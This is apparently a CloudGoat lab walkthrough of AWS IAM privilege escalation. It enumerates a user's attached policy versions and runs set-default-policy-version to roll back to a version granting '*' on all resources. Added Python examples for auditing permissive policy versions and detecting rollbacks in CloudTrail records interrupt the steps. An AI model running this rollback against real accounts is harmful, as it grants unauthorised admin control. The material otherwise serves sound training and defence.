We are given Raynor's access_key and secret_key. Let's configure an AWS CLI profile for them:
aws configure --profile ray
[ACCESS KEY]:
[SECRET KEY]:
....
We now have a CLI profile named ray. Let's see whether we have the privilege to create a demo user:
aws iam create-user --user-name demo --profile ray
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::242643118057:user/demo because no identity-based policy allows the iam:CreateUser action
Sadly, we are not allowed to create users.
Let's dig deeper by enumerating the policies attached to the IAM user raynor:
aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"AttachedPolicies": [
{
"PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh",
"PolicyArn": "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
}
]
}
Let's quickly make a note of that PolicyArn.
Now that we know which policy is attached, let's try getting the policy version:
aws iam get-policy-version --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn, --version-id
Seems like we also need the version id.
Let's try getting that first:
aws iam list-policy-versions --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn
Let's paste the copied PolicyArn and list the version ids. Two versions stand out:
v4 => Denies access to all actions and resources unless the source IP address of the request matches one of the specified IP address ranges
v2 => Grants unrestricted access to all actions ("Action": "*") on all resources ("Resource": "*") within the AWS account
This is the policy version we need to abuse. Let's set it as the default version:
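The check that matters here from the defender's side is not what the default version says, but what the other versions in the policy's history would grant if someone rolled back to them. The following audit is an added example (not CloudGoat's code and not the author's); it assumes a version list assembled from list-policy-versions plus get-policy-version for each VersionId, and uses a constructed policy ARN, account id and documents. It flags every non-default version whose unconditional Allow grants "*" or "iam:*" on "*", which is exactly the v2 situation above.

```python
# Constructed sample (not real account data): the version list a defender would assemble by
# combining `aws iam list-policy-versions` with `aws iam get-policy-version` for each version.
# The policy ARN and account id are placeholders.
SAMPLE_POLICY_ARN = "arn:aws:iam::123456789012:policy/example-rollback-policy"
SAMPLE_VERSIONS = [
    {"VersionId": "v4", "IsDefaultVersion": True, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Deny", "Action": "*", "Resource": "*",
                       "Condition": {"NotIpAddress": {"aws:SourceIp": ["203.0.113.0/24"]}}}]}},
    {"VersionId": "v3", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": "*"}]}},
    {"VersionId": "v2", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    {"VersionId": "v1", "IsDefaultVersion": False, "Document": {
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow", "Action": "iam:*", "Resource": ["*"]}]}},
]


def _as_list(value):
    """IAM policy JSON allows a string or a list in Statement/Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def grants_full_admin(document):
    """True if an unconditional Allow statement grants '*' or 'iam:*' on Resource '*'.
    iam:* on * is treated as admin-equivalent because it can rewrite any policy."""
    for stmt in _as_list(document.get("Statement")):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        resources = set(_as_list(stmt.get("Resource")))
        if "*" in resources and actions & {"*", "iam:*"}:
            return True
    return False


def audit_policy_versions(versions):
    """Return the default VersionId and the ids of non-default versions that would grant
    full admin if a principal holding iam:SetDefaultPolicyVersion rolled back to them."""
    default_id = next((v["VersionId"] for v in versions if v.get("IsDefaultVersion")), None)
    rollback_risks = [v["VersionId"] for v in versions
                      if not v.get("IsDefaultVersion") and grants_full_admin(v["Document"])]
    return default_id, rollback_risks


if __name__ == "__main__":
    default_id, risky = audit_policy_versions(SAMPLE_VERSIONS)
    print(f"{SAMPLE_POLICY_ARN}: default={default_id}, rollback-risk versions={risky}")
    for vid in risky:
        # Unused permissive versions can be removed with delete-policy-version so there is
        # nothing to roll back to.
        print(f"  consider: aws iam delete-policy-version --policy-arn {SAMPLE_POLICY_ARN} --version-id {vid}")
```

On the constructed data the audit reports v4 as the default and v2 and v1 as rollback risks; v3 is skipped because s3:ListBucket is not admin-equivalent, and v4 is skipped because it is a Deny. The mitigation is to delete stale permissive versions rather than leaving them as history, and to avoid granting iam:SetDefaultPolicyVersion to principals whose own policies have such history.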
aws iam set-default-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
Now let's cross-check that v2 is the default policy version with list-policy-versions.
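The set-default-policy-version call above is recorded in CloudTrail as a SetDefaultPolicyVersion event, which is what a detection should key on. The following detector is an added example (not part of this writeup or of CloudGoat); it runs over constructed CloudTrail records with placeholder account id, ARNs and timestamps, plus a constructed map of which managed policies are attached to which principal. It tracks the newest version created per policy, flags any SetDefaultPolicyVersion that selects an older version as a rollback, and raises severity further when the caller changes a policy attached to itself, the self-escalation pattern shown on this page.

```python
# Constructed CloudTrail records (not real logs); account id, ARNs and times are placeholders.
POLICY_ARN = "arn:aws:iam::123456789012:policy/example-rollback-policy"
SAMPLE_EVENTS = [
    {"eventTime": "2024-01-10T09:00:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreatePolicyVersion",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/admin"},
     "requestParameters": {"policyArn": POLICY_ARN, "setAsDefault": True},
     "responseElements": {"policyVersion": {"versionId": "v4", "isDefaultVersion": True}}},
    {"eventTime": "2024-01-11T13:02:11Z", "eventSource": "iam.amazonaws.com",
     "eventName": "ListPolicyVersions",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/raynor"},
     "requestParameters": {"policyArn": POLICY_ARN}, "responseElements": None},
    {"eventTime": "2024-01-11T13:03:40Z", "eventSource": "iam.amazonaws.com",
     "eventName": "SetDefaultPolicyVersion",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/raynor"},
     "requestParameters": {"policyArn": POLICY_ARN, "versionId": "v2"},
     "responseElements": None},
]

# Which managed policies each principal has attached (what list-attached-user-policies would
# return for that user); constructed for this example.
SAMPLE_ATTACHMENTS = {
    "arn:aws:iam::123456789012:user/raynor": {POLICY_ARN},
}


def version_number(version_id):
    """IAM version ids look like 'v4'; compare them numerically."""
    return int(version_id.lstrip("v"))


def detect_policy_rollbacks(events, attachments):
    """Walk CloudTrail records in time order. Track the newest version created per policy and
    report every SetDefaultPolicyVersion, marking it a rollback when an older version is chosen
    and a self-escalation when the policy is attached to the caller itself."""
    newest = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        params = ev.get("requestParameters") or {}
        arn = params.get("policyArn")
        if ev["eventName"] == "CreatePolicyVersion":
            created = ((ev.get("responseElements") or {}).get("policyVersion") or {}).get("versionId")
            if arn and created:
                newest[arn] = max(newest.get(arn, 0), version_number(created))
        elif ev["eventName"] == "SetDefaultPolicyVersion" and arn:
            chosen = version_number(params["versionId"])
            actor = ev["userIdentity"]["arn"]
            rollback = arn in newest and chosen < newest[arn]
            self_escalation = arn in attachments.get(actor, set())
            findings.append({
                "eventTime": ev["eventTime"], "actor": actor, "policyArn": arn,
                "versionId": params["versionId"], "rollback": rollback,
                "self_escalation": self_escalation,
                "severity": "high" if (rollback or self_escalation) else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in detect_policy_rollbacks(SAMPLE_EVENTS, SAMPLE_ATTACHMENTS):
        print(finding)
```

The read-only ListPolicyVersions call is deliberately ignored so the rule stays quiet on normal enumeration; every SetDefaultPolicyVersion is reported at medium severity because it is a rare administrative action, and the rollback plus self-escalation combination seen in this scenario is raised to high.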